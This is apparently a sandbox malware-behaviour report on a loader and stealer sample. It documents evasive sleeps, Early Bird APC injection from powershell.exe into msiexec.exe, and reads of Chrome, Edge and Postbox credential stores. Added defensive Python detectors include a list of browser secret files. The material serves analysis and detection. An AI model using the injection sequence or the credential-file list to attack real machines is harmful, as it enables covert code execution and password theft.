Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597671 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597562 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597453 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597343 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597234 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597124 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597015 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596906 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596792 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596687 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596577 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596468 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596359 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596250 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596140 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596031 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595921 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595812 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595703 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595593 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595484 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595375 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595265 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595156 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595046 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 594937 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 594828 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 594718 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 594609 Jump to behavior
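The two runs of sleep entries above are easy to misread. The values decrease by roughly 110 ms per line from 600000, which is one ten-minute deadline being re-armed with its remaining time, not sixty separate ten-minute sleeps; and 922337203685477 is INT64_MAX 100-ns ticks divided by 10000, the largest relative interval NtDelayExecution can express, i.e. a wait that never expires on its own. The "s" suffix the report prints on "Thread sleep time" matches the millisecond "delay time" values line for line (600000 on both), so the values are treated as milliseconds here. The following triage script is an added example, not part of the Joe Sandbox report or of GuLoader; the sample lines are constructed in the report's format from values on this page, the 3-minute threshold mirrors the "long sleeps (>= 3 min)" signature, and the 1000 ms re-arm step is an assumed tuning value.

```python
import re
from collections import namedtuple

# Largest relative interval NtDelayExecution can express, in milliseconds:
# INT64_MAX 100-ns ticks / 10_000 = 922337203685477. Such a wait never expires.
MAX_RELATIVE_DELAY_MS = (2**63 - 1) // 10_000

SLEEP_RE = re.compile(r"Source: (?P<proc>.+?) TID: (?P<tid>\d+) Thread sleep time: -(?P<ms>\d+)s")
COUNT_RE = re.compile(r"Source: (?P<proc>.+?) TID: (?P<tid>\d+) Thread sleep count: (?P<n>\d+)")
DELAY_RE = re.compile(r"Source: (?P<proc>.+?) Thread delayed: delay time: (?P<ms>\d+)")

Event = namedtuple("Event", "kind proc tid value")

# Constructed sample in the report's line format (values taken from the report),
# plus one unrelated line that the parser must ignore.
SAMPLE_LINES = [
    r"Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7548 Thread sleep time: -4611686018427385s >= -30000s Jump to behavior",
    r"Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -27670116110564310s >= -30000s Jump to behavior",
    r"Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -600000s >= -30000s Jump to behavior",
    r"Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -599867s >= -30000s Jump to behavior",
    r"Source: C:\Windows\SysWOW64\msiexec.exe TID: 4008 Thread sleep count: 1258 > 30 Jump to behavior",
    r"Source: C:\Windows\SysWOW64\msiexec.exe TID: 4008 Thread sleep count: 8603 > 30 Jump to behavior",
    r"Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -599745s >= -30000s Jump to behavior",
    r"Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -599640s >= -30000s Jump to behavior",
    r"Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 922337203685477 Jump to behavior",
    r"Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 600000 Jump to behavior",
    r"Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599867 Jump to behavior",
    r"Source: C:\Users\user\Desktop\Adeleidae.exe Code function: 0_2_00406398 FindFirstFileW,FindClose, 0_2_00406398",
]


def parse(lines):
    """Turn report lines into Events; lines of any other kind are dropped."""
    events = []
    for line in lines:
        if m := SLEEP_RE.search(line):
            events.append(Event("wait", m["proc"], int(m["tid"]), int(m["ms"])))
        elif m := DELAY_RE.search(line):
            # "Thread delayed" entries carry no TID; they mirror the TID lines.
            events.append(Event("wait", m["proc"], None, int(m["ms"])))
        elif m := COUNT_RE.search(line):
            events.append(Event("count", m["proc"], int(m["tid"]), int(m["n"])))
    return events


def collapse_rearmed_waits(events, max_step_ms=1000):
    """Merge a run of waits on one thread whose timeout shrinks by a small step
    each time into one logical wait carrying the first (largest) timeout and the
    number of re-arms. Summing such a run instead would overstate the delay by
    roughly the number of lines in it."""
    waits = []
    for ev in events:
        if ev.kind != "wait":
            continue
        last = waits[-1] if waits else None
        if last and (last["proc"], last["tid"]) == (ev.proc, ev.tid) \
                and 0 <= last["last_ms"] - ev.value <= max_step_ms:
            last["last_ms"] = ev.value
            last["rearms"] += 1
        else:
            waits.append({"proc": ev.proc, "tid": ev.tid, "first_ms": ev.value,
                          "last_ms": ev.value, "rearms": 0})
    return waits


def triage(lines, long_wait_ms=3 * 60 * 1000, loop_threshold=30):
    """Report the three indicators the sandbox signatures key on: waits that can
    never expire, waits at or above the long-sleep threshold, and threads that
    call the sleep API in a tight loop."""
    events = parse(lines)
    findings = {"indefinite": [], "long_waits": [], "sleep_loops": []}
    for w in collapse_rearmed_waits(events):
        if w["first_ms"] >= MAX_RELATIVE_DELAY_MS:
            findings["indefinite"].append((w["proc"], w["tid"], w["first_ms"]))
        elif w["first_ms"] >= long_wait_ms:
            findings["long_waits"].append((w["proc"], w["tid"], w["first_ms"], w["rearms"]))
    for ev in events:
        if ev.kind == "count" and ev.value > loop_threshold:
            findings["sleep_loops"].append((ev.proc, ev.tid, ev.value))
    return findings


if __name__ == "__main__":
    for kind, items in triage(SAMPLE_LINES).items():
        print(kind)
        for item in items:
            print("   ", item)
```

On the sample, the eight msiexec TID 3164 sleep lines collapse to one indefinite wait plus one 600000 ms wait re-armed three times, which is the reading an analyst wants: one ten-minute stall and one wait that only an external event (or a sandbox's sleep-skipping) will end.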
Source: Adeleidae.exe, 00000000.00000002.1814352755.0000000000758000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _VMware_
Source: msiexec.exe, 00000006.00000002.3009741267.0000000009E4A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3009741267.0000000009EA8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\Adeleidae.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\Adeleidae.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_047FF288 LdrInitializeThunk,LdrInitializeThunk, 1_2_047FF288
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process token adjusted: Debug Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\msiexec.exe base: 3CF0000 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe" Jump to behavior
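The four entries above are the complete Early Bird sequence: powershell.exe creates msiexec.exe suspended, writes into it at base 0x3CF0000, queues an APC to the child's thread, and resumes it, so the payload runs from the APC before msiexec's own entry point and before most user-mode hooks are in place. The correlation below is an added example of how to recognise that ordering in an API trace; it is not code from the report or from the sample. The trace records are a constructed schema (one dict per call), the target PID 8056 and base 0x3CF0000 are the report's, and the injector PID, thread IDs, write size and the benign second process are made up.

```python
CREATE_SUSPENDED = 0x00000004  # dwCreationFlags bit of CreateProcessA/W

# API names as an EDR or sandbox trace would record them; Nt* and Win32 spellings both accepted.
CREATE_APIS = {"CreateProcessW", "CreateProcessA"}
WRITE_APIS = {"WriteProcessMemory", "NtWriteVirtualMemory"}
APC_APIS = {"QueueUserAPC", "NtQueueApcThread", "NtQueueApcThreadEx"}
RESUME_APIS = {"ResumeThread", "NtResumeThread"}

# Constructed trace: the powershell.exe -> msiexec.exe sequence from the report
# (target PID and written base are the report's; injector PID 4880, TIDs and the
# size are invented), then a benign installer that starts a child suspended and
# resumes it without touching its memory.
SAMPLE_TRACE = [
    {"pid": 4880, "api": "CreateProcessW", "target_pid": 8056, "flags": CREATE_SUSPENDED,
     "image": r"C:\Windows\SysWOW64\msiexec.exe"},
    {"pid": 4880, "api": "NtWriteVirtualMemory", "target_pid": 8056, "base": 0x3CF0000, "size": 0x23000},
    {"pid": 4880, "api": "NtQueueApcThread", "target_pid": 8056, "tid": 8060, "start": 0x3CF0000},
    {"pid": 4880, "api": "NtResumeThread", "target_pid": 8056, "tid": 8060},
    {"pid": 1200, "api": "CreateProcessW", "target_pid": 1300, "flags": CREATE_SUSPENDED,
     "image": r"C:\Program Files\Vendor\helper.exe"},
    {"pid": 1200, "api": "NtResumeThread", "target_pid": 1300, "tid": 1304},
]


def detect_early_bird(trace):
    """Walk the trace once with per-(injector, child) state. A hit needs, in
    order and before the child's first resume: create-suspended, at least one
    foreign memory write, and an APC queued to the child. Writes or APCs after
    the resume are still injection but not Early Bird, so they are left to
    other rules."""
    state, hits = {}, []
    for ev in trace:
        key = (ev["pid"], ev["target_pid"])
        api = ev["api"]
        if api in CREATE_APIS and ev.get("flags", 0) & CREATE_SUSPENDED:
            state[key] = {"image": ev.get("image"), "writes": [], "apc_tids": set()}
            continue
        st = state.get(key)
        if st is None:
            continue  # no suspended child for this pair: nothing to correlate
        if api in WRITE_APIS:
            st["writes"].append((ev["base"], ev.get("size", 0)))
        elif api in APC_APIS and st["writes"]:
            st["apc_tids"].add(ev["tid"])  # APC queued only counts once a payload is in place
        elif api in RESUME_APIS:
            if st["apc_tids"]:
                hits.append({"injector_pid": ev["pid"], "target_pid": ev["target_pid"],
                             "image": st["image"], "writes": st["writes"],
                             "apc_tids": sorted(st["apc_tids"])})
            del state[key]  # the child runs now; the pre-execution window is closed
    return hits


if __name__ == "__main__":
    for hit in detect_early_bird(SAMPLE_TRACE):
        print("Early Bird APC injection:", hit)
```

The benign pair (1200 -> 1300) is created suspended and resumed, which on its own is what debuggers, job-object setup and some installers do, and it produces no hit because nothing was written into the child; keying on the write-then-APC step rather than on CREATE_SUSPENDED alone is what keeps the rule quiet.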
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Queries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Adeleidae.exe Code function: 0_2_00406077 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW, 0_2_00406077

Stealing of Sensitive Information

Source: Yara match File source: 00000006.00000002.3023161132.0000000025771000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: msiexec.exe PID: 8056, type: MEMORYSTR
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\ Jump to behavior
Source: Yara match File source: 00000006.00000002.3023161132.0000000025878000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
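The file opens above are the stealer's collection pass: a process that is neither Chrome, Edge nor Postbox reads the Chromium Login Data, Network\Cookies, Web Data, History and Top Sites stores and walks the Postbox profile tree. The script below is an added example of turning such file-open records into a verdict; it is not part of the report. It parses the report's own "File opened:" line format, the owning process names (chrome.exe, msedge.exe, postbox.exe) and the two constructed benign lines are assumptions, and the verdict thresholds are a starting point, not a tested rule.

```python
import re
import ntpath
from collections import defaultdict

OPEN_RE = re.compile(r"Source: (?P<proc>.+?) File opened: (?P<path>.+?)(?: Jump to behavior)?\s*$")

# Profile roots and the only process image expected to open files beneath them.
PROFILE_OWNERS = [
    (r"\\Google\\Chrome\\User Data\\", "chrome.exe", "browser"),
    (r"\\Microsoft\\Edge\\User Data\\", "msedge.exe", "browser"),
    (r"\\PostboxApp\\Profiles\\", "postbox.exe", "mail"),
]
# Chromium profile files that hold secrets or tracking data, by basename.
BROWSER_ARTIFACTS = {
    "login data": "saved_passwords",
    "cookies": "cookies",
    "web data": "autofill",
    "history": "browsing_history",
    "top sites": "browsing_history",
}

# The eight report lines, plus two constructed ones: the browser reading its own
# store (legitimate) and msiexec opening an installer package (not a store).
SAMPLE_LINES = [
    r"Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior",
    r"Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior",
    r"Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior",
    r"Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior",
    r"Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior",
    r"Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior",
    r"Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites Jump to behavior",
    r"Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\ Jump to behavior",
    r"Source: C:\Program Files\Google\Chrome\Application\chrome.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data",
    r"Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Windows\Installer\1a2b3c.msi Jump to behavior",
]


def classify_open(process, path):
    """Map one file open to a store category, or None if the path is not a known store."""
    for root_re, owner, kind in PROFILE_OWNERS:
        if re.search(root_re, path, re.IGNORECASE):
            break
    else:
        return None
    if kind == "mail":
        category = "mail_profile"  # any read inside the mail profile tree counts
    else:
        basename = ntpath.basename(path.rstrip("\\")).lower()
        category = BROWSER_ARTIFACTS.get(basename)
        if category is None:
            return None  # cache, preferences and the like: not a secret store
    return {"process": process, "path": path, "owner": owner, "category": category,
            "foreign": ntpath.basename(process).lower() != owner}


def assess(lines):
    """Return (classified opens, categories touched per foreign process, verdict per process)."""
    opens = []
    for line in lines:
        m = OPEN_RE.search(line)
        if m and (c := classify_open(m["proc"], m["path"])):
            opens.append(c)
    categories = defaultdict(set)
    for c in opens:
        if c["foreign"]:
            categories[c["process"]].add(c["category"])
    verdicts = {}
    for proc, cats in categories.items():
        # Secrets (passwords, session cookies) read by a non-owner process, or a
        # sweep across several artifact types, is stealer behaviour; a lone
        # history read might be a backup or indexing tool.
        if cats & {"saved_passwords", "cookies"} or len(cats) >= 3:
            verdicts[proc] = "credential_theft"
        else:
            verdicts[proc] = "profile_access"
    return opens, dict(categories), verdicts


if __name__ == "__main__":
    opens, categories, verdicts = assess(SAMPLE_LINES)
    for proc, verdict in verdicts.items():
        print(proc, "->", verdict, sorted(categories[proc]))
```

The owner check is deliberately by image basename only; in a real pipeline it should be paired with the signer or full path of the opening process, since a stealer can name itself chrome.exe. Note also that for Chromium stores the interesting call is the open of Login Data and Cookies, because decrypting them additionally needs the DPAPI-protected key from the profile's Local State, which is a second file-open worth adding to BROWSER_ARTIFACTS.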

Remote Access Functionality

Source: Yara match File source: 00000006.00000002.3023161132.0000000025771000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: msiexec.exe PID: 8056, type: MEMORYSTR